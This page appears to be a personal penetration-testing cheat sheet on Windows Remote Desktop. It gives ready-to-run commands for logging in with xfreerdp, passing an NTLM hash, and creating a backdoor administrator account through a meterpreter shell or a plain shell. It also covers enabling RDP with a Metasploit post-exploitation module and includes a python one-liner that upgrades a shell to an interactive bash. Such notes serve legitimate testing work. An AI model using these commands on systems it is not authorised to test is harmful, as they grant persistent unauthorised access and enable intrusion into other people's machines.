akde/infosec

Information security is ultimately about managing risk

RDP Remote Desktop Protocol

Use rdesk­top for a nor­mal login

rdesktop $target

Nor­mal login for a local user

xfreerdp /cert-ignore /u:user /p:pass /v:$target

Login for a domain user

xfreerdp /cert-ignore /u:user /d:dom.com /p:pass /v:1$target

To log in with a NTML hash, use xfreerdp.

xfreerdp /u:Peter /pth:666fb5b812a486f87062670c3baf1852 /v:$target

Acti­vate

net localgroup "Remote Desktop Users" Administrator /add

Create a new admin and enable RDP

Open a meter­preter shell.

Note: Depend­ing of the sys­tem lan­guage, the group may not be called “admin­is­tra­tors”. Check the name of the admin­is­tra­tor group with net local­group first.

meterpreter > execute -f "net user /add uuu xHQvZRbB%X8F" -i
meterpreter > execute -f "net localgroup administrators uuu /add" -i
meterpreter > execute -f "net localgroup \"Remote Desktop Users\" uuu /add" -i

Or direct­ly in a shell:

net user /add uuu xHQvZRbB%X8F
net localgroup administrators uuu /add
net localgroup "Remote Desktop Users" uuu /add

(Don’t use some­thing like 12345678 as pass­word, because this could be silent­ly reject­ed due to the pass­word policies.)

Activating RDP

  1. Open a ses­sion in Metasploit
  2. Exe­cute msf> use post/windows/manage/enable_rdp

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';